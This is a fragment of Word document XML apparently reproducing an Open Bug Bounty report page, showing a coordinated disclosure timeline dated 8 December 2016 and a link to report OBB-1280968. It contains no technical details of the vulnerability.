          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
          <w:b w:val="true"/>
          <w:color w:val="F77A00"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cookies:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="313669"/>
        <w:tblW w:w="8415" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8415"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="384"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="4C4C4C" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="4C4C4C" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="4C4C4C" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="4C4C4C" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="4C4C4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distR="0" distB="95097" distL="0">
                  <wp:extent cx="5567362" cy="73818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567362" cy="738187"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln w="9525">
                            <a:solidFill>
                              <a:srgbClr val="C2C2C2"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Heading3"/>
        <w:pBdr/>
        <w:spacing w:after="150" w:before="450"/>
        <w:ind w:left="-374"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:color w:val="F77A00"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Coordinated Disclosure Timeline</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="24" w:name="_Toceytp4do97fdh"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="690737"/>
        <w:tblW w:w="8775" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5084"/>
        <w:gridCol w:w="3690"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability Reported:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">8 December, 2016 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="1D71B8"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>12:13 GMT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability Verified:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">8 December, 2016 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="1D71B8"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>12:15 GMT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Website Operator Notified:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">8 December, 2016 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="1D71B8"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>12:15 GMT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>a. Using publicly available security contacts -good</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>b. Using Open Bug Bounty notification framework-good</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>c. Using security contacts provided by the researcher-good</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="413663"/>
        <w:tblW w:w="8773" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5699"/>
        <w:gridCol w:w="3074"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/about/#submissions"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Report Published [without technical details]:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3074" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">8 December, 2016 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="1D71B8"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>12:15 GMT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="384" w:after="300"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="F77A00"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="735238"/>
        <w:tblW w:w="8791" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2999"/>
        <w:gridCol w:w="3150"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="213"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="53575A"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="53575A"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="53575A"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="53575A" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="53575A"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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bidi w:val="false"/>
              <w:spacing w:line="312"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150"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bidi w:val="false"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680"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pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="960"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pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="false"/>
              <w:spacing w:line="312"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/reports/1280968/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>OBB-1280968</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
